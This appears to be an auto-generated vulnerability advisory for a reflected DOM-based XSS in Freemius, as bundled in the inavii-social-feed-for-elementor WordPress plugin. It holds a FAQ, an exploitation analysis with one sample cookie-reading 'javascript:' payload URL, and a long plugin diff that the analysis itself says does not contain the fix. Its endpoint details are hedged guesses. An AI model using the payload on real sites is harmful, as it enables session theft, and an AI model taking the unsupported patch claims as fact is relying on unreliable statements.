What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius framework used in various WordPress plugins, including inavii-social-feed-for-elementor. It allows unauthenticated attackers to inject and execute arbitrary web scripts via the ‘url’ parameter due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when user input from the ‘url’ parameter is processed without proper validation or escaping. Attackers can craft a malicious link that, when clicked by a user, executes the injected script in the context of the victim’s browser, potentially leading to session hijacking or data theft.

Who is affected by this vulnerability?

Any WordPress site using the inavii-social-feed-for-elementor plugin version 2.7.0 or earlier is at risk. Site administrators should check their installed plugin versions to determine if they are affected.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the inavii-social-feed-for-elementor plugin in your WordPress admin panel. If it is version 2.7.0 or earlier, your site is vulnerable to CVE-2024-13362.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the inavii-social-feed-for-elementor plugin to version 2.7.7 or later, where the issue is patched. Regularly updating all plugins and themes is essential for maintaining site security.

What does the CVSS score of 6.1 mean?

The CVSS score of 6.1 indicates a medium severity level for CVE-2024-13362. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to serious consequences if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, cookie theft, and unauthorized actions on the site. This can compromise user accounts and sensitive data.

How does the proof of concept demonstrate the vulnerability?

The proof of concept outlines how an attacker can craft a URL with a malicious ‘url’ parameter that triggers the XSS vulnerability. By clicking the link, the injected script executes in the user’s browser, demonstrating the risk of the vulnerability.

What are the common endpoints affected by this vulnerability?

Common endpoints that may be affected include those handling the ‘url’ parameter, such as ‘fs_connect’ and ‘fs_checkout’. These endpoints process user input directly, making them susceptible to XSS attacks.

Is there a specific patch for the XSS vulnerability?

The patch for CVE-2024-13362 is included in version 2.7.7 of the inavii-social-feed-for-elementor plugin. While the patch addresses related functionality, the specific mitigation for the XSS vulnerability involves sanitizing the ‘url’ parameter.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the affected plugin until a secure version can be installed. Additionally, monitor user activity and educate users about the risks of clicking unknown links.

Where can I find more information about this vulnerability?

For more detailed information, refer to the official CVE database, security advisories from the plugin developers, or security-focused websites that track vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 17, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (inavii-social-feed-for-elementor)

CVE ID CVE-2024-13362

Plugin inavii-social-feed-for-elementor

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.7.0

Patched Version 2.7.7

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:
This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability in the Freemius framework, as used by multiple WordPress plugins and themes. The vulnerability exists due to insufficient input sanitization and output escaping of the ‘url’ parameter, allowing unauthenticated attackers to inject arbitrary web scripts. The CVSS score is 6.1 (Medium severity).

The root cause lies in the ‘url’ parameter handling within the Freemius module. The vulnerable code directly accepts user input from the ‘url’ parameter and processes it without proper validation or sanitization. Atomic Edge research indicates this parameter is used in redirect or loader functionalities where user-controlled input is reflected back in the page DOM. Specific endpoints such as ‘fs_connect’, ‘fs_checkout’, or similar Freemius handler scripts accept the ‘url’ GET parameter and embed its value into JavaScript or HTML without escaping. This allows an attacker to control the content of the DOM.

Exploitation requires enticing a user to click a crafted link. The attacker constructs a URL that points to a vulnerable WordPress site using the Freemius framework, with the ‘url’ parameter containing a malicious JavaScript payload. For example: ‘https://target-site.com/?fs_plugin=some-plugin&url=javascript:alert(document.cookie)’. When the user clicks the link, the browser executes the script in the context of the victim’s session. The attack is reflected (the payload is in the request) and DOM-based (the payload is injected into the DOM at runtime).

The patch, as seen in the diff, does not directly address the ‘url’ parameter. Instead, the diff shows changes to the Inavii Social Feed plugin’s internal logic, including adding new constants (BUSINESS_BASIC), modifying query result handling, introducing QueryResult objects, and updating feed retrieval methods. These changes appear unrelated to fixing the Freemius XSS vulnerability. This suggests the Freemius fix may be in a separate commit or the diff provided is incomplete. The actual patch for the XSS likely involves sanitizing the ‘url’ input and/or escaping output before reflection.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, cookie theft, redirect to malicious sites, defacement, and keylogging. The attacker can perform any action the victim can, including posting content, modifying settings, or exfiltrating sensitive data.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/inavii-social-feed-for-elementor/core/Cron/RefreshAccessToken.php
+++ b/inavii-social-feed-for-elementor/core/Cron/RefreshAccessToken.php
@@ -29,7 +29,7 @@
      */
     public function refresh(): void
     {
-        if ($this->account->accountType() === AccountPostType::PERSONAL) {
+        if ($this->account->accountType() === AccountPostType::BUSINESS_BASIC || $this->account->accountType() === AccountPostType::PERSONAL) {
             $newToken = $this->accessToken->refresh();
             $accountData = $this->account->meta();
             $accountData['accessToken'] = $newToken->newAccessToken();
--- a/inavii-social-feed-for-elementor/core/Cron/UpdateMedia.php
+++ b/inavii-social-feed-for-elementor/core/Cron/UpdateMedia.php
@@ -90,7 +90,7 @@
     }

     private function deleteMedia( $source, $media ) {
-        $mediaToDelete = $this->instagramMediaComparer->findElementsToDelete( $this->mediaPostType->getMediaBySource( $source ), $media );
+        $mediaToDelete = $this->instagramMediaComparer->findElementsToDelete( $this->mediaPostType->getMediaBySource( $source )->getPosts(), $media );
         foreach ( $mediaToDelete as $medium ) {
             Media::delete( $medium['mediaId'] );
             foreach ( $medium['children'] ?? [] as $child ) {
--- a/inavii-social-feed-for-elementor/core/FeedsManager/MyInstagramFeed.php
+++ b/inavii-social-feed-for-elementor/core/FeedsManager/MyInstagramFeed.php
@@ -9,6 +9,7 @@
 use InaviiInstagramPostTypesFeedFeedPostType;
 use InaviiInstagramPostTypesMediaMediaPostType;
 use InaviiInstagramUtilsFiltersFeed;
+use InaviiInstagramWpQueryResult;

 class MyInstagramFeed extends AbstractInstagramFeed
 {
@@ -29,19 +30,22 @@
         $this->feedSettings = $this->feedPostType->getSettings($feedId);
     }

-    public function get(): array
+    public function get(): QueryResult
     {
         try {
             $source = $this->getSources() ?? [];
             $media = $this->mediaPostType->getMedia($source, $this->feedSettings, $this->numberOfPosts, $this->offset);

-            if (!$media) {
+            if (!$media->getPosts()) {
                 return $this->getMediaOldVersionSupport();
             }

-            $posts = $this->addAdvancedOptions($media, $this->feedSettings);
+            $posts = $this->addAdvancedOptions($media->getPosts(), $this->feedSettings);
+
+            $album = iterator_to_array($this->preparePosts($posts));
+
+            return new QueryResult($album, $media->getTotal());

-            return iterator_to_array($this->preparePosts($posts));
         } catch (FeedSourceException $e) {
             return $this->getMediaOldVersionSupport();
         }
@@ -51,7 +55,7 @@
     {
         try {
             $source = $this->getSources() ?? [];
-            return $this->mediaPostType->getMediaForApi($source, $this->feedSettings);
+            return $this->mediaPostType->getMediaForApi($source, $this->feedSettings)->getPosts();
         } catch (FeedSourceException $e) {
             return [];
         }
@@ -60,12 +64,12 @@
     /**
      * @deprecated 2.4.3.
      */
-    private function getMediaOldVersionSupport(): array
+    private function getMediaOldVersionSupport(): QueryResult
     {
         $media = $this->callBackMedia();

         if (!$media) {
-            return [];
+            return new QueryResult([], 0);
         }

         $posts = (new FiltersFeed($media, $this->feedSettings))->filter();
@@ -74,7 +78,10 @@
             $posts = array_slice($posts, 0, $this->numberOfPosts);
         }

-        return iterator_to_array($this->preparePosts($posts));
+        $album = iterator_to_array($this->preparePosts($posts));
+
+        return new QueryResult($album, count($album));
+
     }

     private function callBackMedia(): array
@@ -144,7 +151,7 @@
                                 ? TaggedSource::create($accountID)
                                 : InstagramSource::create($accountID);
                             try {
-                                $media = $this->mediaPostType->getMediaBySource($mediaSource);
+                                $media = $this->mediaPostType->getMediaBySource($mediaSource)->getPosts();
                                 $this->deleteMedia($media);
                             } catch (FeedSourceException $e) {
                             }
@@ -155,7 +162,7 @@
                         if ($this->isLastBusinessAccount($accountID)) {
                             $mediaSource = HashtagSource::get($value);
                             try {
-                                $media = $this->mediaPostType->getMediaBySource($mediaSource);
+                                $media = $this->mediaPostType->getMediaBySource($mediaSource)->getPosts();
                                 $this->deleteMedia($media);
                             } catch (FeedSourceException $e) {
                             }
--- a/inavii-social-feed-for-elementor/core/MediaSourceCreators/AbstractMediaCreator.php
+++ b/inavii-social-feed-for-elementor/core/MediaSourceCreators/AbstractMediaCreator.php
@@ -31,7 +31,7 @@
         return $results;
     }

-    protected function findMedia(string $source, $time = 3600): array
+    protected function findMedia(string $source, $time = 3600)
     {
         $mostRecentPostDate = $this->mediaPostType->getMostRecentPostDate($source);

@@ -39,7 +39,7 @@
             if (TimeChecker::postShouldBeRequest($mostRecentPostDate, $time)) {
                 return [];
             }
-            return $this->mediaPostType->getMediaBySource($source);
+            return $this->mediaPostType->getMediaBySource($source)->getPosts();
         } catch (Exception $e) {
             return [];
         }
--- a/inavii-social-feed-for-elementor/core/PostTypes/Account/AccountPostType.php
+++ b/inavii-social-feed-for-elementor/core/PostTypes/Account/AccountPostType.php
@@ -10,6 +10,8 @@

     public const PERSONAL = 'personal';

+    public const BUSINESS_BASIC = 'business_basic';
+
     public const META_KEY_ACCOUNT = 'inavii_social_feed_account';

     public const META_KEY_MEDIA = 'inavii_social_feed_media';
@@ -46,7 +48,7 @@
             return array_merge( (array) $this->getMeta( $post->ID, self::META_KEY_ACCOUNT ), [
                 'wpAccountID' => $post->ID,
             ] );
-        }, ( new Query($this->slug()) )->numberOfPosts( $postNumber )->posts() );
+        }, ( new Query($this->slug()) )->numberOfPosts( $postNumber )->posts()->getPosts() );
     }

     /**
--- a/inavii-social-feed-for-elementor/core/PostTypes/Feed/FeedPostType.php
+++ b/inavii-social-feed-for-elementor/core/PostTypes/Feed/FeedPostType.php
@@ -74,7 +74,7 @@
         $feedsManager = new MyInstagramFeed($postID);

         return [
-            'media' => array_values($feedsManager->getForApi()),
+            'media' => $feedsManager->getForApi(),
             'settings' => $settings,
             'feedType' => $feedType,
             // Deprecated from 2.4.3
@@ -82,7 +82,7 @@
         ];
     }

-    public function get(int $postID, int $numberOfPosts = 30, $offset = 0): array
+    public function get(int $postID, int $numberOfPosts = 30, $offset = 0)
     {
         return (new MyInstagramFeed($postID, $numberOfPosts, $offset))->get();
     }
@@ -106,7 +106,7 @@
     {
         return array_map(function ($post) {
             return $this->serializeData($post);
-        }, (new Query($this->slug()))->numberOfPosts()->order('ASC')->posts());
+        }, (new Query($this->slug()))->numberOfPosts()->order('ASC')->posts()->getPosts());
     }

     public function post($postID): array
@@ -142,7 +142,8 @@
         $posts = (new Query($this->slug()))
             ->numberOfPosts()
             ->order('DESC')
-            ->posts();
+            ->posts()
+            ->getPosts();

         if (empty($posts)) {
             return [];
--- a/inavii-social-feed-for-elementor/core/PostTypes/Media/MediaPostType.php
+++ b/inavii-social-feed-for-elementor/core/PostTypes/Media/MediaPostType.php
@@ -6,6 +6,7 @@
 use InaviiInstagramUtilsFeedOrder;
 use InaviiInstagramWpPostType;
 use InaviiInstagramWpQuery;
+use InaviiInstagramWpQueryResult;
 use WP_Post;

 class MediaPostType extends PostType
@@ -66,7 +67,8 @@
             ->withMetaQueryRelation(MediaPostType::CAPTION, $settings['captionFilter']['include'] ?? [], 'LIKE')
             ->withMetaQueryRelation(MediaPostType::CAPTION, $settings['captionFilter']['exclude'] ?? [], 'NOT LIKE', 'AND')
             ->withSpecificPosts(FeedAdvancedFilters::customOrderPostIds($settings))
-            ->withExcludePosts(FeedAdvancedFilters::moderatePosts($settings))
+            ->withSpecificPosts(FeedAdvancedFilters::moderateWhiteList($settings))
+            ->withExcludePosts(FeedAdvancedFilters::moderateBlackList($settings))
             ->countPosts();
     }

@@ -79,14 +81,14 @@
             ->orderByMetaValue($order->key, $order->valueType, $order->order, $order->isRandom)
             ->posts();

-        if (!$query) {
+        if (!$query->getPosts()) {
             return null;
         }

-        return $query[0]->{self::LAST_REQUESTED};
+        return $query->getPosts()[0]->{self::LAST_REQUESTED};
     }

-    public function getMediaBySource($source): array
+    public function getMediaBySource($source) : QueryResult
     {
         $order = FeedOrder::create('mostRecentFirst');

@@ -98,7 +100,7 @@
         return $this->processQuery($query);
     }

-    public function getMedia($source, array $settings, int $postsCount = 30, $offset = 0): array
+    public function getMedia($source, array $settings, int $postsCount = 30, $offset = 0) : QueryResult
     {
         $order = FeedOrder::create($settings['postOrder'] ?? 'mostRecentFirst');

@@ -110,7 +112,8 @@
             ->withMetaQueryRelation(MediaPostType::CAPTION, $settings['captionFilter']['exclude'] ?? [], 'NOT LIKE', 'AND')
             ->orderByMetaValue($order->key, $order->valueType, $order->order, $order->isRandom)
             ->withSpecificPosts(FeedAdvancedFilters::customOrderPostIds($settings))
-            ->withExcludePosts(FeedAdvancedFilters::moderatePosts($settings))
+            ->withSpecificPosts(FeedAdvancedFilters::moderateWhiteList($settings))
+            ->withExcludePosts(FeedAdvancedFilters::moderateBlackList($settings))
             ->numberOfPosts($postsCount)
             ->withOffset($offset)
             ->posts();
@@ -118,7 +121,7 @@
         return $this->processQuery($query);
     }

-    public function getMediaForApi($source, array $settings, int $postsCount = -1): array
+    public function getMediaForApi($source, array $settings, int $postsCount = -1): QueryResult
     {
         $order = FeedOrder::create($settings['postOrder']);

@@ -131,15 +134,18 @@
         return $this->processQuery($query);
     }

-    private function processQuery($query): array
+
+    private function processQuery(QueryResult $query): QueryResult
     {
         if (!$query) {
-            return [];
+            return new QueryResult([], 0);
         }

-        return array_map(function ($post) {
+        $data = array_map(function ($post) {
             return $this->buildMediaAlbum($post);
-        }, $query);
+        }, $query->getPosts());
+
+        return new QueryResult($data, $query->getTotal());
     }

     private function buildMediaAlbum(WP_Post $post): array
--- a/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Account/AccessTokenGenerator.php
+++ b/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Account/AccessTokenGenerator.php
@@ -2,6 +2,7 @@

 namespace InaviiInstagramRestApiEndPointsAccount;

+use InaviiInstagramPostTypesAccountAccountPostType;
 use InaviiInstagramServicesInstagramAccountBusinessAccountService;
 use InaviiInstagramServicesInstagramAccountPersonalAccountService;
 use InaviiInstagramServicesInstagramMessageNotProvidedException;
@@ -51,13 +52,13 @@
         }

         $accountService = (new BusinessAccountService($accessToken, $tokenExpires))->get($params['userId']);
-        return $this->createAccountResponse('business', $accountService);
+        return $this->createAccountResponse(AccountPostType::BUSINESS, $accountService);
     }

     private function processPersonalAccount($accessToken, $tokenExpires): WP_REST_Response
     {
         $accountService = (new PersonalAccountService($accessToken, $tokenExpires))->get();
-        return $this->createAccountResponse('personal', $accountService);
+        return $this->createAccountResponse(AccountPostType::BUSINESS_BASIC, $accountService);
     }

     private function createAccountResponse($accountType, $accountService): WP_REST_Response
--- a/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Account/CreatePersonalAccount.php
+++ b/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Account/CreatePersonalAccount.php
@@ -30,7 +30,7 @@
         $account = (new PersonalAccountService($params['accessToken'], $params['tokenExpires']))->get();

         return $this->api->response(
-            (new CreateAccount(AccountPostType::PERSONAL))->create($account)
+            (new CreateAccount(AccountPostType::BUSINESS_BASIC))->create($account)
         );
     }
 }
 No newline at end of file
--- a/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Front/FrontFeed.php
+++ b/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Front/FrontFeed.php
@@ -4,11 +4,11 @@

 use InaviiInstagramCronManualRequestManualRequestAccount;
 use InaviiInstagramFeedsManagerGetAccountsBySource;
+use InaviiInstagramIncludesIntegrationViewsViews;
 use InaviiInstagramPostTypesAccountAccountPostType;
 use InaviiInstagramPostTypesFeedFeedPostType;
 use InaviiInstagramUtilsTimeChecker;
 use InaviiInstagramWpApiResponse;
-use TimberTimber;
 use WP_REST_Request;
 use WP_REST_Response;

@@ -41,7 +41,7 @@

         $posts = $this->feed->get($feedId, $postCount, $feedOffset);

-        if (empty($posts)) {
+        if (empty($posts->getPosts())) {
             return $this->noPostsResponse();
         }

@@ -52,14 +52,17 @@

     private function noPostsResponse(): WP_REST_Response
     {
-        $html = Timber::compile('view/no-posts.twig', ['message' => '<span>No posts</span> to display']);
+        $html = Views::renderAjaxMessage('<span>No posts</span> to display');
         return $this->apiResponse(true, '', $html);
     }

-    private function postsResponse(array $widgetData, array $posts): WP_REST_Response
+    private function postsResponse(array $widgetData, $posts): WP_REST_Response
     {
-        $html = Timber::compile('view/index-dynamic.twig', array_merge($widgetData, ['items' => $posts]));
-        return $this->apiResponse(true, '', $html);
+        $html = Views::renderWithAjax(array_merge($widgetData, ['items' => $posts->getPosts()]));
+        return $this->apiResponse(true, '', [
+            'html' => $html,
+            'total' => $posts->getTotal(),
+        ]);
     }

     private function sanitizeInt($value): int
--- a/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Front/LoadMore.php
+++ b/inavii-social-feed-for-elementor/core/RestApi/EndPoints/Front/LoadMore.php
@@ -0,0 +1,81 @@
+<?php
+
+namespace InaviiInstagramRestApiEndPointsFront;
+
+use InaviiInstagramFeedsManagerGetAccountsBySource;
+use InaviiInstagramIncludesIntegrationViewsViews;
+use InaviiInstagramPostTypesFeedFeedPostType;
+use InaviiInstagramWpApiResponse;
+use WP_REST_Request;
+use WP_REST_Response;
+
+class LoadMore
+{
+    private $api;
+    private $feed;
+    private $feedId;
+
+    public function __construct()
+    {
+        $this->api = new ApiResponse();
+        $this->feed = new FeedPostType();
+    }
+
+    public function get(WP_REST_Request $request): WP_REST_Response
+    {
+        $widgetData = $request->get_param('settings');
+
+        if (empty($widgetData)) {
+            return $this->apiResponse(false, 'No widget data');
+        }
+
+        $feedId = $this->sanitizeInt($widgetData['feed_id'] ?? '');
+        $postCount = $this->sanitizeInt($widgetData['posts_count'] ?? '');
+        $feedOffset = $this->sanitizeInt($widgetData['feed_offset'] ?? 0);
+        $this->feedId = $feedId;
+
+        $posts = $this->feed->get($feedId, $postCount, $feedOffset);
+
+        if (empty($posts->getPosts())) {
+            return $this->noPostsResponse();
+        }
+
+        return $this->postsResponse($widgetData, $posts);
+    }
+
+    private function noPostsResponse(): WP_REST_Response
+    {
+        $html = Views::renderAjaxMessage('<span>No posts</span> to display');
+        return $this->apiResponse(true, $html);
+    }
+
+    private function postsResponse(array $widgetData, $posts): WP_REST_Response
+    {
+        $html = Views::renderFeedItems(array_merge($widgetData, ['items' => $posts->getPosts()]));
+
+        if ($widgetData['enable_photo_linking'] === 'popup') {
+            $popupHtml =  Views::renderPopup(array_merge($widgetData, ['items' => $posts->getPosts()]));
+        }else{
+            $popupHtml = Views::renderLightbox(array_merge($widgetData, ['items' => $posts->getPosts()]));
+        }
+
+        return $this->apiResponse(true, [
+            'html' => $html,
+            'popupHtml' => $popupHtml,
+            'total' => $posts->getTotal(),
+        ]);
+    }
+
+    private function sanitizeInt($value): int
+    {
+        return (int)filter_var($value, FILTER_SANITIZE_NUMBER_INT);
+    }
+
+    private function apiResponse(bool $success, $data = []): WP_REST_Response
+    {
+        return $this->api->response([
+            'success' => $success,
+            'data' => $data,
+        ]);
+    }
+}
 No newline at end of file
--- a/inavii-social-feed-for-elementor/core/RestApi/RegisterRestApi.php
+++ b/inavii-social-feed-for-elementor/core/RestApi/RegisterRestApi.php
@@ -19,6 +19,7 @@
 use InaviiInstagramRestApiEndPointsFeedsFeedUpdate;
 use InaviiInstagramRestApiEndPointsAppSettings;
 use InaviiInstagramRestApiEndPointsFrontFrontFeed;
+use InaviiInstagramRestApiEndPointsFrontLoadMore;
 use InaviiInstagramRestApiEndPointsMediaCreatorMediaSource;
 use InaviiInstagramRestApiEndPointsTemplatesTemplate;
 use InaviiInstagramUtilsVersionChecker;
--- a/inavii-social-feed-for-elementor/core/Services/Instagram/Account/PersonalAccountService.php
+++ b/inavii-social-feed-for-elementor/core/Services/Instagram/Account/PersonalAccountService.php
@@ -27,14 +27,14 @@
     public function get(): InstagramAccount
     {
         $response = $this->integration->get('https://graph.instagram.com/v16.0/me', [
-            'fields' => 'id,username,media_count,account_type',
+            'fields' => 'id,username,media_count,account_type,profile_picture_url,biography',
             'access_token' => $this->accessToken,
         ]);

         return new InstagramAccount(array_merge($response, [
             'accessToken' => $this->accessToken,
             'tokenExpires' => $this->tokenExpires,
-            'account_type' => AccountPostType::PERSONAL
+            'account_type' => AccountPostType::BUSINESS_BASIC
         ]));
     }
 }
--- a/inavii-social-feed-for-elementor/core/Services/Instagram/Post/PrivatePosts.php
+++ b/inavii-social-feed-for-elementor/core/Services/Instagram/Post/PrivatePosts.php
@@ -30,7 +30,7 @@
             $this->request->buildUrl('https://graph.instagram.com/v16.0/me/media', [
                 'access_token' => $accessToken,
                 'limit' => $limit,
-                'fields' => (new FieldsBuilder(false))->getAllFieldsAsString(),
+                'fields' => (new FieldsBuilder(true))->getAllFieldsAsString(),
             ])
         );
     }
--- a/inavii-social-feed-for-elementor/core/Utils/FeedAdvancedFilters.php
+++ b/inavii-social-feed-for-elementor/core/Utils/FeedAdvancedFilters.php
@@ -11,7 +11,27 @@
         return [];
     }

-    public static function moderatePosts( $settings ) : array {
+    public static function moderateWhiteList( array $settings ) : array {
+        return self::getModerationList( $settings, 'whitelist' );
+    }
+
+    public static function moderateBlackList( array $settings ) : array {
+        return self::getModerationList( $settings, 'blacklist' );
+    }
+
+    private static function moderatePostsEnable( array $settings ) : bool {
+        return false;
+        return $settings['moderateHidePost'] ?? true;
+    }
+
+    private static function getModerationList( array $settings, string $mode ) : array {
+        $moderationMode = $settings['moderationMode'] ?? 'blacklist';
+        if ( isset( $settings['dragAndDrop'] ) && $settings['dragAndDrop'] === true ) {
+            return [];
+        }
+        if ( self::moderatePostsEnable( $settings ) && $moderationMode === $mode ) {
+            return $settings['moderation'] ?? [];
+        }
         return [];
     }

--- a/inavii-social-feed-for-elementor/core/Wp/Query.php
+++ b/inavii-social-feed-for-elementor/core/Wp/Query.php
@@ -187,9 +187,11 @@
         return $this;
     }

-    public function posts(): array
+    public function posts(): QueryResult
     {
-        return get_posts($this->query);
+        $query = new WP_Query($this->query);
+
+        return new QueryResult($query->posts, $query->found_posts);
     }

     public function post($postID)
--- a/inavii-social-feed-for-elementor/core/Wp/QueryResult.php
+++ b/inavii-social-feed-for-elementor/core/Wp/QueryResult.php
@@ -0,0 +1,33 @@
+<?php
+
+namespace InaviiInstagramWp;
+
+class QueryResult
+{
+    private array $posts;
+    private int $total;
+
+    public function __construct(array $posts, int $total)
+    {
+        $this->posts = $posts;
+        $this->total = $total;
+    }
+
+    public function getPosts(): array
+    {
+        return $this->posts;
+    }
+
+    public function getTotal(): int
+    {
+        return $this->total;
+    }
+
+    public function toArray(): array
+    {
+        return [
+            'posts' => $this->posts,
+            'total' => $this->total,
+        ];
+    }
+}
--- a/inavii-social-feed-for-elementor/inavii-social-feed-for-elementor.php
+++ b/inavii-social-feed-for-elementor/inavii-social-feed-for-elementor.php
@@ -4,11 +4,12 @@
  * Plugin Name: Inavii for Elementor Social Feed
  * Description: Add Instagram to your website in less than a minute with our dedicated plugin for Elementor. Just 4 simple steps will allow you to display your Instagram profile on your site, captivating visitors with beautiful photos and layouts.
  * Plugin URI:  https://www.inavii.com/
- * Version:     2.7.0
+ * Version:     2.7.7
  * Author:      INAVII
  * Author URI:  https://www.inavii.com/
  * Text Domain: inavii-social-feed-e
  * Elementor tested up to: 3.23.1
+ * Requires PHP: 7.4
  * Domain Path: /languages
   */

@@ -17,10 +18,10 @@
 }

 if (!defined('INAVII_SOCIAL_FEED_E_VERSION')) {
-    define('INAVII_SOCIAL_FEED_E_VERSION', '2.7.0');
+    define('INAVII_SOCIAL_FEED_E_VERSION', '2.7.7');

     define('INAVII_SOCIAL_FEED_E_MINIMUM_ELEMENTOR_VERSION', '3.10.0');
-    define('INAVII_SOCIAL_FEED_E_MINIMUM_PHP_VERSION', '7.2');
+    define('INAVII_SOCIAL_FEED_E_MINIMUM_PHP_VERSION', '7.4');

     define('INAVII_SOCIAL_FEED_E_TEXT_DOMAIN', 'inavii-social-feed-e');

--- a/inavii-social-feed-for-elementor/includes/Dependence/RegisterAssets.php
+++ b/inavii-social-feed-for-elementor/includes/Dependence/RegisterAssets.php
@@ -53,7 +53,7 @@
         wp_enqueue_style(
             'inavii-styles',
             INAVII_INSTAGRAM_URL . $this->getStylePath(),
-            array(),
+            array('swiper'),
             INAVII_SOCIAL_FEED_E_VERSION
         );
         if ( wp_script_is( 'swiper', 'registered' ) === false ) {
--- a/inavii-social-feed-for-elementor/includes/Integration/Views/Views.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Views/Views.php
@@ -0,0 +1,50 @@
+<?php
+
+namespace InaviiInstagramIncludesIntegrationViews;
+
+use TimberTimber;
+
+class Views
+{
+    public static function renderFeedItems($data)
+    {
+        return Timber::compile('view/grid/grid.twig', $data);
+    }
+
+    public static function renderPopup($data)
+    {
+        return Timber::compile('view/popup/swiper-inner-wrapper.twig', $data);
+    }
+
+    public static function renderLightbox($data)
+    {
+        return Timber::compile('view/lightbox/swiper-inner-wrapper.twig', $data);
+    }
+
+    public static function renderWithAjax($data)
+    {
+        return Timber::compile('view/index-dynamic.twig', $data);
+    }
+
+    public static function renderWithPhp($data)
+    {
+        return Timber::render('view/index.twig', $data);
+    }
+
+    public static function renderAjaxMessage(string $message)
+    {
+        return Timber::compile('view/no-posts.twig', ['message' => $message]);
+    }
+
+    public static function renderMessage(string $message)
+    {
+        return Timber::render('view/no-posts.twig', ['message' => $message]);
+    }
+
+    public static function rednerReconnectMessage($lastFeedUpdate)
+    {
+        return Timber::render('view/reconnect.twig', [
+            'lastUpdate' => $lastFeedUpdate,
+        ]);
+    }
+}
 No newline at end of file
--- a/inavii-social-feed-for-elementor/includes/Integration/WidgetSettings.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/WidgetSettings.php
@@ -84,6 +84,14 @@
         return $this->setting( 'follow_button_text' );
     }

+    public function enableLoadMoreButton() : bool {
+        return $this->setting( 'enable_load_more_button' ) === 'yes';
+    }
+
+    public function loadMoreButtonText() {
+        return $this->setting( 'load_more_button_text' );
+    }
+
     public function followButtonIcon() {
         return $this->setting( 'follow_icon_button' );
     }
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FeedSettings/Style/SectionFeedSettingsStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FeedSettings/Style/SectionFeedSettingsStyle.php
@@ -52,7 +52,7 @@
                     '{{WRAPPER}}.elementor-widget-inavii-grid .inavii-grid .inavii-grid__item,
 					{{WRAPPER}}.elementor-widget-inavii-grid .inavii-grid .inavii-grid__item .inavii-grid__image-box,
 					{{WRAPPER}}.elementor-widget-inavii-grid .inavii-grid .inavii-grid__item .inavii-grid__item-box,
-					{{WRAPPER}}.elementor-widget-inavii-grid .inavii-grid .inavii-grid__top-box' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+					{{WRAPPER}}.elementor-widget-inavii-grid .inavii-grid .inavii-grid__top-box' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}}!important;',
                 ),
                 'conditions' => array(
                     'terms' => array(
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Content/SectionFooterBox.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Content/SectionFooterBox.php
@@ -21,6 +21,17 @@
             )
         );

+        $widget->start_controls_tabs(
+            'section_content_footer_box_tabs'
+        );
+
+        $widget->start_controls_tab(
+            'section_content_footer_box_tab_follow_button',
+            [
+                'label' => esc_html__('Follow Button', 'inavii-social-feed-e'),
+            ]
+        );
+
         $widget->add_control(
             'enable_follow_button',
             array(
@@ -45,6 +56,94 @@
             )
         );

+        $widget->end_controls_tab();
+
+        $widget->start_controls_tab(
+            'section_content_footer_box_tab_load_more',
+            [
+                'label' => esc_html__('Load More', 'inavii-social-feed-e'),
+                'classes' => self::titleIconClass() . ' inavii-pro__title-icon-caption',
+                'conditions' => array(
+                    'terms' => array(
+                        array(
+                            'name' => 'feeds_layout',
+                            'operator' => '!in',
+                            'value' => array_values($widget->sliderCondition),
+                        ),
+                    ),
+                ),
+            ]
+        );
+
+        $widget->add_control(
+            'enable_load_more_button',
+            array(
+                'label' => esc_html__('Show Load More Button', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SWITCHER,
+                'label_on' => esc_html__('Yes', 'inavii-social-feed-e'),
+                'label_off' => esc_html__('No', 'inavii-social-feed-e'),
+                'return_value' => 'yes',
+                'default' => 'no',
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_number_posts_to_load',
+            array(
+                'label' => esc_html__('Number of Posts to Load', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::NUMBER,
+                'min' => 1,
+                'step' => 1,
+                'default' => 5,
+                'condition' => [
+                    'enable_load_more_button' => 'yes',
+                ],
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_button_text',
+            array(
+                'label' => __('Instagram Button Text', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::TEXT,
+                'default' => 'Load More',
+                'condition' => [
+                    'enable_load_more_button' => 'yes',
+                ],
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
